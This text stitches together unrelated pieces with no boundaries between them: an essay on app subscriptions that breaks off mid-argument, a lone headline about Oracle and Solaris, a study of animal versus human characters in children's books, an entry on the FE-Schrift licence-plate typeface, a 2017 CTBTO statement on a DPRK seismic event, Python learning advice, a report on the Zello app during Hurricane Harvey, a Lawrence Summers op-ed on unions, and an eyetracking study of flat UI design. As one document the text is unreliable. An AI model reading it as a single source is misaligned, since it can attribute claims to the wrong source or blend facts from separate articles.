
The Subscription App Paradox


The Push For Your Cash

You must sympathise with developers — they have challenges.

Creating their beloved product, securing start-up funding, refining the product, launching it, shipping new features, making new friends because the old ones lost touch, burning the midnight oil, divorce proceedings, and so on.

Developers and entrepreneurs deserve to get paid for what they produce.

What I want to challenge is the preconceived notion that subscriptions are the best way.

Subscriptions are direct debits from your bank account and every $30 adds up.

Users need to think hard about the first rental and later renewals.

The Catalyst

Subscriptions, or rentals, have been a business model for as long as I can remember. Buying a TV in the 1970s was madness because they exploded, so we always rented.

Software companies have switched to rental options in recent years. Adobe Photoshop once cost £600–700 outright, but today's £20-a-month subscription feels affordable.

Microsoft charges £80 a year for Office 365. While that is not much cheaper than the £120 one-off purchase, the one-off version excludes new feature updates and technical support.

Unlike larger software packages, apps are going through both an economic and cultural shift from one-off fees to rental.

In June 2016, Apple changed the iOS App Store to encourage app subscriptions. Apple reduced its commission from 30% to 15% and created 200 different price points for maximum flexibility. Google followed.

Hence, industry leaders push subscriptions with one purpose — to make more money.

The Fallacy of Recurring Revenue

One selling point for subscription-based apps is the continuous revenue they allegedly generate for the developer.

The assumption relies on customers re-subscribing each year and on new subscriptions compensating for those who leave.

The size of the marketplace is supposed to guarantee profit, with the number of smartphone users projected to reach 2.87 billion by 2020. If the subscription model carves out even a small fraction of these users, it will gain traction. Revenue from app stores is forecast to pass $190 billion by 2020, so there is room for every business model.

Pay-per-download is falling out of favour with developers, everyone hates ads, and the freemium model fails to guarantee user upgrades.

Subscriptions are here to stay and we need to accept it.

The challenge for app creators is to reverse the trend where 80% of users abandon apps within the year.


Oracle laid off all Solaris tech staff in a classic silent EOL of the product


Children's books with humans have greater moral impact than animals, study finds


Forget the morals that millennia of children have learned from the Hare and the Tortoise and the Fox and the Crow: Aesop would have had a greater effect with his fables if he’d put the stories into the mouths of human characters, at least according to new research from the University of Toronto’s Ontario Institute for Studies in Education (OISE).

In the Canadian study, researchers read one of three stories to almost 100 children between four and six years old: Mary Packard’s Little Raccoon Learns to Share, in which anthropomorphic animals learn that sharing makes you feel good; a version of the story in which the animal illustrations were replaced with human characters; or a control book about seeds.

Before they were read the story, the children chose 10 stickers to take home and were told that an anonymous child would not have any stickers to take home. It was suggested to the children that they could share their stickers with the stickerless child by putting them in an envelope when the experimenter was not looking. After they had been read the story, the children were allowed to choose another 10 stickers, and again asked to donate to the stickerless child.

The study, which has just been published in the journal Developmental Science, found that those children who were read the book with human characters became more generous, while “in contrast, there was no difference in generosity between children who read the book with anthropomorphised animal characters and the control book; both groups showed a decrease in sharing behaviour,” they write.

The academics, led by Patricia Ganea, associate professor of early cognitive development at OISE, said that existing studies using the same method showed that before they are six, “children share hardly any stickers with their friends, and even after age six, children keep most of the stickers for themselves”, so the task “offers a lot of room for children to change their sharing behaviour after reading the story”.

But reading a book about sharing “had an immediate effect on children’s pro-social behaviour”, they found. “However, the type of story characters significantly affected whether children became more or less inclined to behave pro-socially. After hearing the story containing real human characters, young children became more generous. In contrast, after hearing the same story but with anthropomorphised animals or a control story, children became more selfish.”

Ganea said that while “a growing body of research has shown that young children more readily apply what they’ve learned from stories that are realistic … this is the first time we found something similar for social behaviours”.

“The finding is surprising given that many stories for young children have human-like animals,” said Ganea.

From Aesop to the Gruffalo via Winnie-the-Pooh, talking animals play a major part in children’s literature. A 2002 review of around 1,000 children’s titles found that “more than half of the books featured animals or their habitats, of which fewer than 2% depicted animals realistically”, the majority anthropomorphising them.

Ganea felt that it would be useful for children’s authors to be aware of her research. “We tell stories to children for many reasons, and if the goal is to teach them a moral lesson then one way to make the lesson more accessible to children is to use human characters. Yes, we should consider the diversity of story characters and the roles they are depicted in,” she said.

Chris Haughton, author and illustrator of animal picture books including Oh No, George! and Shh! We Have a Plan, felt that while “a simple instructional moral message might work short term”, the stories that have longer impact are the ones that resonate deeply. “I read Charlotte’s Web as a child and I know that made a big impression on me. I thought about it for a long time after I read the story. I identified with the non-human characters. That, among other things, did actually turn me into a lifelong vegetarian. I think a truly engaging and quality story that resonates with the child will be replayed in their mind and that has the real effect on them and the course of their life,” he said.

Picture book author Tracey Corderoy said that in her experience, “where the main characters of a moral tale are animals as opposed to humans, the slight distancing that this affords the young child does a number of important things. It softens the moral message a little, making it slightly more palatable. Some would feel that this waters it down and makes it less effective. But the initial ‘saving-face’ that using animals brings quite often results, I feel at least, in keeping a child reader engaged.”

Kes Gray, the author of the bestselling rhyming animal series Oi Frog and Friends, was unperturbed by the researchers’ findings. “Authors and illustrators have no need to panic here, as long as we keep all of the animal protagonists in all of their future stories unreservedly cuddly. Big hair, big eyes and pink twitchy noses should pretty much nail it,” he said.

FE-Schrift: forgery-impeding typeface

FE-Schrift
Category: Sans-serif
Designer(s): Karlgeorg Hoefer
Foundry: Bundesanstalt für Straßenwesen

Sample image caption: A demonstration of attempted alteration of characters set in the FE-Schrift typeface. The series "PBF" (top row) is modified to read "R3E" (middle row, in red). The correct appearance of the series "R3E" is shown in the bottom row.

The FE-Schrift[1] or Fälschungserschwerende Schrift (forgery-impeding typeface) is a typeface introduced for use on license plates. Its monospaced letters and numbers are slightly disproportionate to prevent easy modification and to improve machine readability. It was developed in Germany, where it has been mandatory since November 2000.[2]

The abbreviation "FE" is derived from the compound German adjective "fälschungserschwerend", combining the noun "Fälschung" (falsification) and the verb "erschweren" (to hinder). Other countries have since introduced the same or a derived typeface for their license plates, taking advantage of the FE-Schrift's proven design.

Development

The motivation for creating the typeface arose in the late 1970s, in the light of Red Army Faction terrorism, when it was discovered that with the then-standard font for vehicle registration plates—the DIN 1451 font—it was particularly easy to modify letters by applying a small amount of black paint or tape. For example, it was easy to change a "P" to an "R" or "B", a "3" to an "8", or an "L" or "F" to an "E". Modifications to FE-font plates are somewhat more difficult, as they also require the use of white paint, which is easily distinguished at a distance from the retroreflective white background of the plate, in particular at night.

The original design for the FE-Schrift typeface was created by Karlgeorg Hoefer, who was working for the Bundesanstalt für Straßenwesen (Federal Highway Research Institute of Germany) at the time. The typeface was slightly modified according to the results of tests that ran from 1978 to 1980 at the University of Giessen (Department of Physiology and Cybernetic Psychology).[3] Whilst the DIN typeface is a proportional font, the FE-Schrift is a monospaced font (with different widths for letters and numbers) for improved machine readability. Faked FE-Schrift letters (e.g., "P" altered to "R") appear conspicuously disproportionate.

The final publication in German law for usage on license plates includes three variants – normal script ("Mittelschrift" – 75 mm high and 47.5 mm wide letters, with 44.5 mm wide digits), narrow script ("Engschrift" – 75 mm high and 40.5 mm wide letters, with 38.5 mm wide digits) and a small script ("verkleinerte Mittelschrift" – 49 mm high and 31 mm wide letters, with 29 mm wide digits).[2] The legal typeface includes umlaut vowels, as these occur in German county codes at the start of the license plate number.[4] The narrow font allows nine characters to fit on a standard Euro license plate; shorter numbers are supposed to be printed with larger spaces between characters so as to fill the available space on the plate.

Adoption process

When the FE-Schrift was finished in 1980, the pressure for its adoption had already lessened. Its spread was furthered by another development: the introduction of the Euro license plate. Some German federal states introduced the new design during 1994, and from 1 January 1995 it was rolled out nationwide by a federal law that also came to include the FE-Schrift, which had been in the planning since the 1970s. The shift in legislation coincided with the first lifting of borders within the Schengen zone in 1995. With the extension of the Schengen zone in 1998, the new license plate design found EU-wide acceptance (even in non-Schengen countries), removing the older requirement to add a separate country-code plate when driving abroad, an advantage for citizens. The option to be issued the old (non-Euro) license plate design was dropped on 1 November 2000, and the legislation dropped the older typeface for license plates at the same time. The FE-Schrift has been mandatory in Germany since then, although older license plates remain valid. There is an exception allowing historic cars to receive new plates in the DIN typeface, and the Bundeswehr armed forces generally continue to issue their plates in the DIN typeface.

Other countries have begun to introduce a forgery-impeding typeface as well, either adopting the FE-Schrift directly or using a derived variant. Adopting the original design, including the Euro license plate format, is generally cost-effective[5]; while in many countries license plates are produced by the state, that is not the case in Germany. There, the car owner has to pay for a new plate, which receives a registration stamp to be valid on the road (the round stamp is placed between the county code and the local registration code). In the vicinity of the vehicle registration offices, several small shops compete to press a plate on the spot; their stamping machines are highly standardized, and the German license plate design is tailored to allow cheap production at high quality.[6]

  • Argentina – since 2016
  • Armenia – since 2014
  • Bosnia and Herzegovina – in 2009 a new Euro-style license plate design was introduced along with the FE-Schrift typeface. The new design (dropping the national crest used on the old Euro-style plates since 1998) is closer to the Euro license plate.
  • Chile – since April 2014
  • Colombia – since 2016, only for diplomatic cars
  • Cuba – a 2013 resolution on a new license plate scheme opted for the Euro license plate format and the FE-Schrift. The reasoning is to lower the cost while increasing the quality of the plates, with the change to be completed by May 2016.[5]
  • Cyprus – since 3 June 2013
  • Latvia – only for tractors and tractor trailers; car, car trailer and motorcycle plates use DIN 1451.[7]
  • Kyrgyzstan – since 2016[citation needed]
  • Malta – a Euro-style license plate design was introduced in 1995, and after accession to the EU in 2004 the new Euro license plates were standardized on the FE-Schrift.
  • Moldova – since 1 April 2015
  • Sri Lanka – since August 2000, with a variation of the FE-Schrift developed by a German company
  • South Africa – the numbering scheme and license plate design were changed in 1994, which also introduced the FE-Schrift.
  • South Sudan – initially only used on government vehicles[8]
  • Tanzania, Namibia, Zambia, Cameroon, Sierra Leone, Botswana, Mali, Ethiopia, Guinea, Malawi, Zimbabwe, Rwanda, Mozambique, Uganda – other African countries followed, with Tanzania using the FE-Schrift since the 1990s.
  • Uruguay – the old three-digit numbering scheme was exhausted in 2001, leading to a new scheme in Montevideo in 2002 that not only used four digits but also adopted the FE-Schrift. The new license plate design has been mandatory across Uruguay since 2011.
  • Uzbekistan – since 2009


Some countries[which?] allow the FE-Schrift as an alternative to the standard typeface, especially in combination with a Euro-style license plate. This is often used for vanity plates on German car models, e.g. in Australia.


References

  1. ^ Schrift für Kfz-Kennzeichen. Bundesanstalt für Straßenwesen, Postfach 100150, 51401 Bergisch Gladbach, Germany.
  2. ^ StVO, FZV – Anlage 4
  3. ^ http://www.fsd.it/usefuldesign/german_plates_font.htm
  4. ^ See Vehicle registration plates of Germany
  5. ^ Marcel Kunzmann (2013-05-22). "Kuba modernisiert seine Kfz-Kennzeichen". Cuba Heute.
  6. ^ Maschinen und Werkzeuge zur Herstellung von geprägten Kfz-Kennzeichen (in German). Autoschilder Sievers. 2014-05-10. Dubbed as Machines and tools for the assembly of automobile number plates. Autoschilder Sievers. 2014-05-12.
  7. ^ http://avto-nomer.ru/newforum/index.php?app=forums&module=forums&controller=topic&id=9152
  8. ^ "South Sudan to have unified number plates for cars". Gurtong. 4 February 2016. Retrieved 2 October 2016.

CTBTO statement on the unusual seismic event detected in the DPRK


Vienna, 3 September 2017

“Our monitoring stations picked up an unusual seismic event in the Democratic People’s Republic of Korea (DPRK) today at 03:30 (UTC). So far over 100 of our stations are contributing to the analysis. The event seems to have been larger than the one our system recorded in September last year and the location is very similar to that event. Our initial location estimate shows that the event took place in the area of the DPRK’s nuclear test site. ( 03-SEP-2017 03:30:06 LAT=41.3 LON=129.1 )
 
Our experts are now analysing the event to establish more about its nature and we are preparing to brief our Member States today in Vienna.
 
“If confirmed as a nuclear test, this act would indicate that the DPRK's nuclear programme is advancing rapidly. It constitutes yet another breach of the universally accepted norm against nuclear testing; a norm that has been respected by all countries but one since 1996. It also underlines yet again the urgent need for the international community to act on putting in place a legally binding ban on nuclear testing once and for all. I urge the DPRK to refrain from further nuclear testing and to join the 183 States Signatories who have signed the Comprehensive Nuclear-Test-Ban Treaty (CTBT).  I sincerely hope that this will serve as the final wake-up call to the international community to outlaw all nuclear testing by bringing the CTBT into force,” said Lassina Zerbo, Executive Secretary of the Comprehensive Nuclear-Test-Ban Treaty Organization (CTBTO).
 
Broadcast quality footage will be posted in the CTBTO Newsroom as it becomes available.

Background
 
The CTBT bans all nuclear explosions. The Treaty will enter into force once signed and ratified by the remaining eight nuclear technology holder countries: China, Egypt, the DPRK, India, Iran, Israel, Pakistan, and the United States.
 
A verification regime is being built to monitor compliance with the Treaty. Nearly 90 percent of the 337 facilities of the International Monitoring System (IMS) are already in place. The system swiftly, reliably and precisely detected all five of the DPRK’s declared nuclear tests. After the DPRK’s announced nuclear test on 12 February 2013, the CTBTO was the only organization to detect radioactivity attributable to the event.
 
CTBTO Member States are provided with data collected by the monitoring stations, as well as data analyses prepared by the International Data Centre in Vienna, Austria. Once the Treaty has entered into force, an on-site inspection can be invoked in case of a suspicious event.

For updates follow us on Twitter @ctbto_alerts and @SinaZerbo


Learning Python Without Library Overload


I was just browsing Quora after coming back from dinner, and there were a lot of night owls asking “How do I learn XYZ from scratch?”

Naturally, I swooped in to assist with the Python-related questions. Believe it or not, there is a wrong way to learn Python. I have seen many people of many different ages get burnt out on learning Python because they went about it all wrong. The key to learning Python is to do just that, no more, no less.

Learn Python, not Libraries

Python packages can both extend its functionality and modify the way it is written. There are a ton of packages available, and some of them are so large and complex that they require a course of their own. I often see self-educators get hung up on package-specific syntax while trying to learn vanilla Python.

People can get burnt out on Python when they try to learn it in conjunction with packages that alter its syntax and behavior. Thus, for a self-educator’s first few projects, I recommend they avoid complex packages to better familiarize themselves with vanilla Python.

Packages to Avoid While Learning

  • numpy and pandas
  • matplotlib
  • PIL and cv2
  • beautifulsoup, selenium, urllib, and scrapy
  • flask, django, jinja2
  • tkinter, pyqt, pyWX

Packages Encouraged while Learning

  • os, sys, and argparse
  • re
  • json, csv, and pprint
  • datetime and time
  • math, statistics, and random

Case Study

I was once tutoring a Master’s candidate at the University of Virginia in how to use Python. She was interested in learning Python to interface with the OpenCV API via the cv2 module. I had recommended many educational resources to her, from complete-beginner texts to advanced OpenCV texts.

After a week of self-teaching, she had not made much progress in learning Python, mainly because she was trying to debug a specific script she found online. The script would read images via OpenCV’s cv2, then use matplotlib to display them. The script used a strange matplotlib function I had never seen before for displaying the images. So, when she came to me with the error, I had no idea how to fix it. But… I did know how to accomplish the same thing with cv2 alone.

All the while, she had learned nothing about Python itself, because she was busy trying to debug a matplotlib function. Obviously, her time would have been much better spent reading the first few chapters of an introductory Python book. I wouldn’t say that this student was unmotivated, rather that she was working a little too hard to fix an archaic and unnecessary matplotlib function.

So, we had to go back to the basics (where we should have started). This was no big deal, but it shone a light on how cavalier attitudes towards learning often do more harm than good.

Conclusion and Project Ideas

Keen readers may have noticed that all of the packages listed as “encouraged” for learning are shipped with vanilla Python. There is a reason for this. The core developers only write and accept highly Pythonic packages for distribution with the base environment.

Don’t be afraid to get your hands dirty with educational projects. Even if they don’t do anything useful or new, they are important to your education in a language where almost everything has been packaged already.

  1. Summary Stats. Read a csv file whose path is supplied on the command line via argparse and os, load it into a list of lists with csv, generate summary statistics with math and statistics, then print a friendly table of those statistics with pprint or string formatting (a minimal sketch appears after this list).
  2. Book Analyzer. Read in Romeo and Juliet as an enormous string using os and with statements, then use re to count occurrences of common words or letters. Print statistics about the frequencies and see if they follow Zipf’s Law.
  3. Sudoku Checker. Given a 9×9 list of numbers (organized as a list of lists), check whether a Sudoku row, column, square, and board are valid. Use random to generate integers for your board. Experiment with slice notation on lists to write efficient code. If you are feeling ambitious, use random and for loops to estimate the probability of a random Sudoku row, column, square, and board being valid under various conditions.
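As a rough illustration of the first project, here is a minimal sketch using only standard-library modules mentioned above; the assumed file layout (a header row followed by mostly numeric columns) and the choice to skip non-numeric columns are assumptions made for the example, not requirements.

import argparse
import csv
import statistics
from pprint import pprint

def summarize(path):
    # Load the CSV into a list of lists; treat the first row as the header.
    with open(path, newline="") as f:
        rows = list(csv.reader(f))
    header, data = rows[0], rows[1:]

    stats = {}
    for i, name in enumerate(header):
        try:
            column = [float(row[i]) for row in data]
        except ValueError:
            continue  # skip columns that are not numeric
        stats[name] = {
            "min": min(column),
            "max": max(column),
            "mean": statistics.mean(column),
            "stdev": statistics.stdev(column) if len(column) > 1 else 0.0,
        }
    return stats

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Print summary statistics for a CSV file")
    parser.add_argument("csv_path", help="path to the CSV file")
    args = parser.parse_args()
    pprint(summarize(args.csv_path))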

Once you are comfortable with the core tenets of Python, and the Pythonic elements of the syntax, you will have an easy and productive time exploring its best libraries.

Zello: The ‘Cajun Navy’s’ secret weapon for saving lives


The Cajun Navy is utilizing several apps in its efforts to rescue victims of Tropical Storm Harvey. (Jhaan Elker/The Washington Post)

For so much of our moment-to-moment communication, texting fits the bill. Quick and convenient, tapping out a few words with your thumbs cuts through the pleasantries that can bog down voice communication.

But there are times when a single word — especially one uttered with emotion — can deliver far more information than a text.

For example: An elderly victim screaming “help” as the waters rise in the aftermath of Hurricane Harvey.

“With voice, someone can communicate a ton of information in a way that text does not,” said Bill Moore, the chief executive of Zello, a free Internet “walkie-talkie” app. “In a few seconds of hearing your voice, I can guess what part of the country you’re from, if you’ve been drinking, what mood you’re in, whether you’re afraid or in distress.”

“For that reason, voice becomes great for solving problems, and it demands attention from both sides in a way that texting does not,” he added. “Your brain is wired for voice.”

Therein lies the secret behind the proliferation of Zello, which has become the preferred mode of communication for organizations such as the “Cajun Navy,” an informal group of Louisiana boat owners who participated in this week’s search-and-rescue missions in Southeastern Texas.

The app allows flood victims and rescuers to communicate instantly. It also allows both groups to post voice messages to specific channels that have been set up to aid people seeking assistance, such as “Texas Volunteer Rescue/Support” and “Harvey Animal Rescue” and the “CajunNavy,” which has nearly 25,000 users.

Over the past week, Moore said, Zello usage has increased twentyfold. The number of user sessions increased 600 percent over the past week, with the amount of time users in the Houston area were on the app increasing to 22 minutes, Moore said.

The app is another powerful example of how social media is filling the humanitarian holes that local government is unable to plug, turning ordinary people into heroes and empowering desperate flood victims to reclaim their fate from the rising floodwaters. Flood victims have also turned to Facebook, Instagram and Twitter to reach private rescuers when public officials have been overwhelmed. But as messages on those platforms proliferated and became unwieldy to manage, the Cajun Navy began asking people to connect with rescuers using Zello exclusively.

The app relies on cellphone data plans or WiFi, Moore said, but was designed to operate in areas where signals can be weak, such as those served by the outdated telecom technology known as 2G.

“That’s why it’s so popular in disaster areas,” Moore said.

Rescuers consider the app a hybrid between talking and texting. Unlike a Twitter conversation, which can be difficult to follow, Zello allows groups of people to communicate simultaneously, which is advantageous for grass-roots rescue efforts and has led some to label the app “social radio.”

The app has 100 million users around the globe, Moore said, often in countries where government services struggle to meet demand, such as Egypt, South Africa, Venezuela, parts of the Middle East and now parts of the U.S. Gulf Coast.

“It’s really common in times of trouble for a rescue structure to emerge organically,” Moore said. “The Cajun Navy is using Zello to augment the emergency services and build a culture that is quick and effective.”

There are limitations. The app doesn’t work if it can’t connect to a network, and users must be aware of its existence, an issue for any new product. That can be a problem for those who don’t own mobile phones or are unfamiliar with apps. Overwhelmingly, those are the same people who are most vulnerable during disasters — the poor and the elderly.

Still, the app offers a window into the role technology can play in a crisis.

As the tragedy in southeast Texas unfolded this week, rescuers could be heard discussing all manner of chaos, from an elderly couple trapped on their roof to a fire at a chemical plant that threatened to contaminate the surrounding floodwaters.

“I have a diabetes patient and a sick baby,” a woman could be heard saying Wednesday, before offering her address. “I need a boat rescue.”

“I have a 102-year-old male in Port Arthur taking on quite a bit of water, and he cannot swim,” another woman said urgently moments later. “He is in a panic.”

“There’s an elderly lady, 61, rising water,” another user reported. “She needs help.”

The app was also being used to help rescuers coordinate among one another. Between desperate calls for help from all over the region Wednesday afternoon, boaters checked in to confirm particular victims had been rescued, trade information about inaccessible areas and offer details about a staging area where boaters could grab a bite to eat and talk to the media. Moments later, a request arrived for boaters to patrol that night with sheriff’s deputies attempting to keep looters at bay. People seeking to volunteer their experience, such as individuals with boats and fast-water rescuing experience, also left messages offering their service.

When Zello channels experience high traffic, victims are encouraged to write down crucial information about their location and send a picture to channels that rescuers can view, which happened constantly Wednesday.

“Is anyone in the southwest area of Houston, by loop 610 and highway 59,” a man could be heard saying. “I have an address to submit to you guys. It’s not for me, it’s for someone on my Periscope page.”

Nearly 170 miles away in Austin, where Zello is based, Zello’s chief executive was listening as well.

Moore said he’s been spending several hours a day listening to Zello traffic in his office while working. He hears tragedy, of course, but also triumph.

“It’s really fascinating to listen to,” he said. “You find yourself wanting to cry when someone is about to drown and then feeling thrilled when someone has been rescued.” 

“The app feels like a shared experience,” he added.


It’s time to balance the power between workers and employers


Lawrence Summers is a professor at and past president of Harvard University. He was treasury secretary from 1999 to 2001 and an economic adviser to President Barack Obama from 2009 through 2010.

The central issue in American politics is the economic security of the middle class and their sense of opportunity for their children. As long as a substantial majority of American adults believe that their children will not live as well as they did, our politics will remain bitter and divisive.

Surely related to middle-class anxiety is the slow growth of wages even in the ninth year of economic recovery. The Phillips curve — which postulates that tighter labor markets lead to an acceleration of wage growth — appears to have broken down. Unemployment is at historically low levels, but the Bureau of Labor Statistics reported Friday that average hourly earnings last month rose by all of 3 cents — little more than a 0.1 percent bump. For the past year, they rose by only 2.5 percent. In contrast, profits of the S&P 500 are rising at a 16 percent annual rate.

What is going on? Economists don’t have complete answers. In part, there are inevitable year-to-year fluctuations (profits have declined in several recent years). And in part, BLS data reflects wages earned in the United States, even though a bit less than half of profits are earned abroad and have become more valuable as the dollar has declined relative to other currencies. And finally, wages have not risen because a strengthening labor market has drawn more workers into the labor force.

But I suspect the most important factor is that employers have gained bargaining power over wages while workers have lost it. Technology has given some employers — depending on the type of work involved — more scope for replacing American workers with foreign workers (think outsourcing) or with automation (think boarding-pass kiosks at airports) or by drawing on the gig economy (think Uber drivers). So their leverage to hold down wages has increased.

On the other hand, other factors have decreased the leverage of workers. For a variety of reasons, including reduced availability of mortgage credit and the loss of equity in existing homes, it is harder than it used to be to move to opportunity. Diminished savings in the wake of the 2008 financial crisis means many families cannot afford even a brief interruption in work. Closely related is the observation that workers as consumers appear more likely than years ago to have to purchase from monopolies — such as a consolidated airline sector or local health-care providers — rather than from firms engaged in fierce price competition. That means their paychecks do not go as far.

On this Labor Day, we would do well to remember that unions have long played a crucial role in the American economy in evening out the bargaining power between employers and employees. They win higher wages, better working conditions and more protection from unjust employer treatment for their members. More broadly, they provide crucial support in the political process for programs such as Social Security and Medicare that benefit members and nonmembers alike. (Both were passionately opposed by major corporations at their inception.)

Today, only 6.4 percent of private-sector workers belong to a union — a decline of nearly two-thirds since the late 1970s. This is one important contributor to the decline in the relative power of labor, especially those who work with their hands. Workers seeking gigs on their own are inevitably less secure than a group collectively representing their interests. The decline in unionism is also a contributor to the pervasive sense that our political system is too often for sale to the highest bidder.

What can be done? This surely is not the moment for lawmakers to further strengthen the hand of large employers over their employees. Sooner or later — and preferably sooner — labor-law reform should be back on the national agenda, especially to punish employers who engage in firing organizers. We should also encourage union efforts to organize people in nontraditional ways, even when they do not involve formal collective bargaining. And policymakers should support institutions such as employee stock ownership plans, where workers have a chance to share in profits and in corporate governance.

In an era when the most valuable companies are the Apples and the Amazons rather than the General Motors and the General Electrics, the role of unions cannot go back to being what it was. But on this Labor Day, any leader concerned with the American middle class needs to consider that the basic function of unions, balancing the power of employers and employees, is as important to our economy as it has ever been.


Flat UI Elements Attract Less Attention and Cause Uncertainty


The popularity of flat design in digital interfaces has coincided with a scarcity of signifiers. Many modern UIs have ripped out the perceptible cues that users rely on to understand what is clickable.

Using eyetracking equipment to track and visualize users’ eye movements across interfaces, we investigated how strong clickability signifiers (traditional clues such as underlined, blue text or a glossy 3D button) and weak or absent signifiers (for example, linked text styled as static text or a ghost button) impact the ways users process and understand web pages.

About the Study

Webpages Used as Stimuli

There are many factors that influence a user’s interaction with an interface. To directly investigate the differences between traditional, weak, and absent signifiers in the visual treatments of interactive elements, we needed to remove any confounding variables.

We took 9 web pages from live websites and modified them to create two nearly identical versions of each page, with the same layout, content and visual style. The two versions differed only in the use of strong, weak, or absent signifiers for interactive elements (buttons, links, tabs, sliders).

In some cases, that meant taking an already flat page and adding shadows, gradients, and text treatments to add depth and increase the strength of the clickability signifiers. In other cases, we took a page that already had strong, traditional signifiers, and we created an ultraflat version. We were careful to ensure that the modifications we made were reasonable and realistic.

We chose these interfaces as study materials because, for the most part, they’re decent designs that are representative of the better sites on the web. We set out to isolate the differences between signifier-rich and signifier-poor interfaces, not to evaluate the design of these sites.

We selected 9 sites from 6 different domains:

  • Ecommerce (bookstore, sunglass retailer, fine jewelry)
  • Nonprofit
  • Hotel
  • Travel (car rental, flight search engine)
  • Technology
  • Finance

For each of the stimuli pairs, we wrote a short task to direct the user’s attention to a specific interactive element on the page. For example, for the hotel site, the task was: “You will see a page from a hotel website. Reserve this hotel room. Please tell us when you have found where you would click.”

All 18 page designs and the wording of all 9 tasks are available in a sidebar.

Methodology

We conducted a quantitative experiment using eyetracking equipment and a desktop computer. We recruited 71 general web-users to participate in the experiment. Each participant was presented with one version of the 9 sites and given the corresponding task for that page. As soon as participants saw the target UI element that they wanted to click to complete the task, they said “I found it” and stopped.

We tracked the eye movements of the participants as they were performing these tasks. We measured the number of fixations on each page, as well as the task time. (A fixation happens when the gaze lingers on a spot of interest on the page).

Both of these measures reflect user effort: the more fixations and time spent doing the task, the higher the processing effort, and the more difficult the task. In addition, we created heatmap visualizations by aggregating the areas that participants looked at the most on the pages.

The study was conducted as a between-subjects design — each participant saw only one version of each page. We randomized assignment to either version of each page, as well as the order in which participants saw the pages. (See our course on Measuring User Experience for more on designing quantitative studies.)

All participants began with a practice task on the same stimulus to make sure they understood the instructions before they began the real tasks. Especially with quantitative studies like this one, it’s a good idea to use a practice task to ensure that participants understand the instructions. (It’s also best to conduct pilot testing before even starting the real study to iron out any methodology issues.)

This experiment was not a usability study. Our goal was to see how users processed individual page designs, and how easily they could find the target elements, not to identify usability problems in the designs. (Usability studies of live sites rarely involve a single page on a website; most often, people are asked to navigate through an entire site to accomplish a goal.)

Results

Number of Fixations and Time on Page

When we compared average number of fixations and average amount of time people spent looking at each page, we found that:

  • The average amount of time was significantly higher on the weak-signifier versions than the strong-signifier versions. On average participants spent 22% more time (i.e., slower task performance) looking at the pages with weak signifiers.
  • The average number of fixations was significantly higher on the weak-signifier versions than the strong-signifier versions. On average, people had 25% more fixations on the pages with weak signifiers.

(Both findings were significant by a paired t-test with sites as the random factor, p < 0.05.)
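For readers curious about what such an analysis involves, here is a minimal sketch of a paired comparison across sites; the per-site mean task times below are hypothetical numbers, and scipy's ttest_rel is used purely as an illustration rather than as the authors' exact procedure.

# Hypothetical per-site mean task times in seconds, paired by site.
from scipy import stats

strong = [9.8, 12.1, 7.4, 15.0, 10.2, 8.9, 11.3, 13.7, 9.1]   # strong-signifier versions
weak = [12.0, 14.5, 9.3, 18.2, 12.6, 10.4, 14.1, 16.9, 11.0]  # weak-signifier versions

# Paired t-test: each site contributes one strong/weak pair of means.
t_stat, p_value = stats.ttest_rel(weak, strong)
print(f"t = {t_stat:.2f}, p = {p_value:.4f}")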

This means that, when looking at a design with weak signifiers, users spent more time looking at the page, and they had to look at more elements on the page. Since this experiment used targeted findability tasks, more time and effort spent looking around the page are not good. These findings don’t mean that users were more “engaged” with the pages. Instead, they suggest that participants struggled to locate the element they wanted, or weren’t confident when they first saw it.

22% longer task time for the weak-signifier designs may seem terrible. But remember that our metrics reflect time spent while looking for where to click. The tasks we measured were very specific and represent just a small component of real web tasks. In regular web use, people spend more time on other task aspects such as reading the information on a page. When you add in these other aspects, the slowdown for a full task (such as shopping for a new pair of shoes) would often be less than the 22% we measured.

On the other hand, the increased click uncertainty in weak-signifier designs is likely to occasionally cause people to click the wrong thing — something we didn’t measure in this study. Recovering from incorrect clicks can easily consume more time, especially since users don’t always realize their mistake immediately. Beyond the actual time wasted, the emotional impact of increased uncertainty and decreased empowerment is an example of how mediocre experience design can hurt brand perception.

Heatmaps

Heatmaps are quantitative visualizations that aggregate the number and duration of eye fixations on a stimulus (the UI). They can be created from the gaze data of many participants, as long as they all look at the same stimulus with the same task.

Heatmaps based on all participants’ data convey important information about the page areas that are relevant for the task (provided that the number of participants is high enough). In our color coding, the red areas were those which received the most and longest fixations. Orange, yellow, and purple areas received less attention, and areas with no overlay color were not viewed by any of the test participants.
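As a rough sketch of the kind of aggregation a heatmap involves (not the tooling used in this study), fixation data could be binned into a grid along these lines; the fixation record format, the coordinates, and the cell size are assumptions made for illustration.

from collections import defaultdict

# Hypothetical fixation records: (x, y, duration_ms) in page-pixel coordinates.
fixations = [(310, 220, 180), (305, 228, 240), (640, 410, 120)]

def build_heatmap(fixations, cell=50):
    # Sum fixation durations per grid cell; cells with more total duration are "hotter".
    grid = defaultdict(float)
    for x, y, duration in fixations:
        grid[(x // cell, y // cell)] += duration
    return grid

heat = build_heatmap(fixations)
print(max(heat, key=heat.get))  # the hottest cell, (6, 4) for the sample data above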

When comparing the two versions of each page pair (strong signifiers vs. weak signifiers) we found that the pages fell into two groups: those with nearly identical user gaze patterns for the two versions, and those with different user gaze patterns (as indicated by the heatmaps).

Page Pairs with Different User Gaze Patterns

Of the pages we tested, 6 out of the 9 pairs had different user gaze patterns. With the exception of the signifier strength, we eliminated all other variations in page design within a given pair, so we can conclude that the signifiers changed how users processed the page in their task.

One major overarching difference emerged when comparing the 6 pairs of pages. The weak-signifier versions of the pages resulted in a broader distribution of fixations across the page: people had to look around more. This result reinforced our findings that weak-signifier pages required more fixations and more time than strong-signifier ones.

We never saw the reverse pattern: no strong-signifier version had a more spread-out distribution than its weak-signifier counterpart.

This difference suggests that participants had to consider more potentially interactive elements in the weak-signifier versions. Because the target elements (links, tabs, buttons, sliders) lacked strong, traditional signifiers, they didn’t have the same power to draw the participants’ attention or confidence. In many cases, participants fixated on the target element, but then moved on to other elements on the page — presumably because they hadn’t immediately recognized it as the solution to the task.

Of the six sites, one page pair displayed a particularly dramatic difference in the heatmaps. The original interface used to create the stimuli was a zig-zag layout from a fine-jewelry website. The page layout featured three sections, each with a heading, short paragraph of text, product image, and text link.

To create the strong version of the page, the text links were given a traditional link treatment: blue color and underlined text. To create the weak version, we took inspiration from a common tactic of ultraflat designs, and made the text links identical to the static text. The placement of the text links (below the paragraphs) was left the same in both stimuli.

